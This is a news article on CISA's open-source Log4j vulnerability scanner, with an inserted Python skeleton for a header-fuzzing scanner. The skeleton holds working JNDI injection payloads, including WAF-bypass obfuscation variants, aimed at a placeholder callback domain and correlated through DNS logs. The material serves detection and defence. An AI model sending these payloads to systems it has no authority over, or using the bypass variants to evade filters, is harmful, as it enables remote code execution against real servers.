
The US Cybersecurity and Infrastructure Security Agency (CISA) has announced the release of an open-source scanner for identifying web services impacted by Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046.
CISA said it modified a Log4j scanner created by security company FullHunt, with the help of other researchers like Philipp Klaus, Andrei Fokau, and Moritz Bechler.
The Log4j scanner provided by CISA implements the following features:
- Support for lists of URLs
- Support for DNS callback for vulnerability discovery and validation
- Fuzzing for more than 60 HTTP request headers
- Fuzzing for HTTP POST Data parameters
- Fuzzing for JSON data parameters
- WAF Bypass payloads
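To show what those features amount to in practice, here is a stripped-down scanner skeleton, added as an example for this article; it is not CISA's or FullHunt's code. It plans one JNDI lookup payload per (URL, header, payload variant) with a unique random token in the callback hostname, sends the requests, and then correlates a DNS callback log back to the exact injection point. Everything here is an assumption for illustration: `CALLBACK_DOMAIN` is a placeholder you must replace with a domain whose DNS queries you log, the header list is a small subset of the 60+ headers the real tool fuzzes, the four payload templates are only a sample of the obfuscation variants it carries, and the sample log lines are constructed.

```python
"""Minimal Log4Shell (CVE-2021-44228) header-fuzzing scanner skeleton.
Added example, not CISA's or FullHunt's code. Assumptions: CALLBACK_DOMAIN
is a placeholder for a domain whose DNS you log; HEADERS_TO_FUZZ and
PAYLOAD_TEMPLATES are small subsets of what log4j-scan actually uses."""
import re
import secrets
import urllib.error
import urllib.request

CALLBACK_DOMAIN = "dns.example.invalid"  # assumption: replace with your own

# Subset of headers that commonly end up in application logs (the real tool fuzzes >60).
HEADERS_TO_FUZZ = [
    "User-Agent", "Referer", "X-Forwarded-For", "X-Api-Version",
    "Authorization", "Cookie", "X-Forwarded-Host", "Origin", "Accept",
]

# Template 0 is the plain lookup. Templates 1-3 are WAF-bypass variants: Log4j 2.x
# resolves the inner ${lower:x}, ${::-x} (empty key, default x) and ${env:NOPE:-x}
# lookups first, so the JNDI lookup still fires while rules matching the literal
# string "${jndi:" never see it. %s is replaced with the callback hostname.
PAYLOAD_TEMPLATES = [
    "${jndi:ldap://%s/a}",
    "${${lower:j}ndi:${lower:l}dap://%s/a}",
    "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://%s/a}",
    "${${env:NOPE:-j}ndi:ldap://%s/a}",
]


def build_payload(token, variant=0, domain=CALLBACK_DOMAIN):
    """Embed the per-probe token as the leftmost DNS label of the callback host."""
    return PAYLOAD_TEMPLATES[variant] % f"{token}.{domain}"


def plan_scan(urls, domain=CALLBACK_DOMAIN, headers=HEADERS_TO_FUZZ):
    """Return (plan, token_map). Each (url, header, variant) gets its own random
    12-hex-char token, so a single DNS hit identifies the exact injection point."""
    plan, token_map = [], {}
    for url in urls:
        for header in headers:
            for variant in range(len(PAYLOAD_TEMPLATES)):
                token = secrets.token_hex(6)
                plan.append((url, {header: build_payload(token, variant, domain)}))
                token_map[token] = (url, header, variant)
    return plan, token_map


def send_probes(plan, timeout=5.0):
    """Fire the planned requests. The HTTP response is irrelevant: detection is
    out of band via DNS, so connection errors and non-2xx codes are ignored."""
    for url, headers in plan:
        req = urllib.request.Request(url, headers=headers)
        try:
            urllib.request.urlopen(req, timeout=timeout).close()
        except (urllib.error.URLError, OSError, ValueError):
            pass


def correlate(callback_log, token_map, domain=CALLBACK_DOMAIN):
    """Map DNS callback log lines back to (url, header, variant). Only tokens
    we issued count, which drops noise and third parties replaying our payloads."""
    pattern = re.compile(r"\b([0-9a-f]{12})\." + re.escape(domain) + r"\b",
                         re.IGNORECASE)
    hits = {}
    for line in callback_log.splitlines():
        m = pattern.search(line)
        if m and m.group(1).lower() in token_map:
            hits[m.group(1).lower()] = token_map[m.group(1).lower()]
    return hits


if __name__ == "__main__":
    # Constructed target and callback log; nothing here is sent anywhere.
    plan, tokens = plan_scan(["http://198.51.100.7:8080/login"],
                             headers=["User-Agent", "X-Api-Version"])
    for url, hdrs in plan[:4]:
        print(url, hdrs)
    hit_token = next(iter(tokens))
    sample_log = (
        f"2021-12-13T10:00:01Z query A {hit_token}.{CALLBACK_DOMAIN} from 203.0.113.5\n"
        f"2021-12-13T10:00:02Z query A deadbeefcafe.{CALLBACK_DOMAIN} from 203.0.113.9\n"
    )
    print(correlate(sample_log, tokens))
```

In a real run you would call `send_probes(plan)` against hosts you are authorised to test, wait for the LDAP/DNS resolution to happen (it can be delayed by log buffering or asynchronous appenders), then feed your resolver's query log to `correlate`. Note that a DNS hit proves the lookup was evaluated, not that the JNDI class-loading path is exploitable on that JVM; that is what the LDAP side of a full callback server is for.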
Similarly, US cybersecurity company CrowdStrike released its own free Log4j scanner called the CrowdStrike Archive Scan Tool, or “CAST”.